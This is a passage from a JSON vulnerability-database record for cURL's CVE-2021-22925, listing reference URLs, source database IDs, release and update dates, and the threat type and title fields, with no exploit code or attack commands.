"url": "https://access.redhat.com/security/cve/cve-2021-3620"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38297"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "164249"
},
{
"db": "PACKETSTORM",
"id": "164246"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-381399",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165287",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164249",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164246",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165862",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22925",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381399",
"ident": null
},
{
"date": "2021-12-15T15:20:33",
"db": "PACKETSTORM",
"id": "165286",
"ident": null
},
{
"date": "2021-12-15T15:20:43",
"db": "PACKETSTORM",
"id": "165287",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2022-03-28T15:52:16",
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"date": "2021-09-22T16:35:10",
"db": "PACKETSTORM",
"id": "164249",
"ident": null
},
{
"date": "2021-09-22T16:33:18",
"db": "PACKETSTORM",
"id": "164246",
"ident": null
},
{
"date": "2021-12-02T16:06:16",
"db": "PACKETSTORM",
"id": "165129",
"ident": null
},
{
"date": "2021-11-30T14:44:48",
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"date": "2022-02-04T17:26:39",
"db": "PACKETSTORM",
"id": "165862",
"ident": null
},
{
"date": "2022-05-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"ident": null
},
{
"date": "2021-08-05T21:15:11.467000",
"db": "NVD",
"id": "CVE-2021-22925",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381399",
"ident": null
},
{
"date": "2025-09-19T08:29:00",
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"ident": null
},
{
"date": "2024-03-27T15:11:42.063000",
"db": "NVD",
"id": "CVE-2021-22925",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165129"
}
],
"trust": 0.1
},
"title": {
"_id": null,
"data": "cURL\u00a0 Vulnerability in using uninitialized resources in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "165099"
}
],
"trust": 0.3
}
}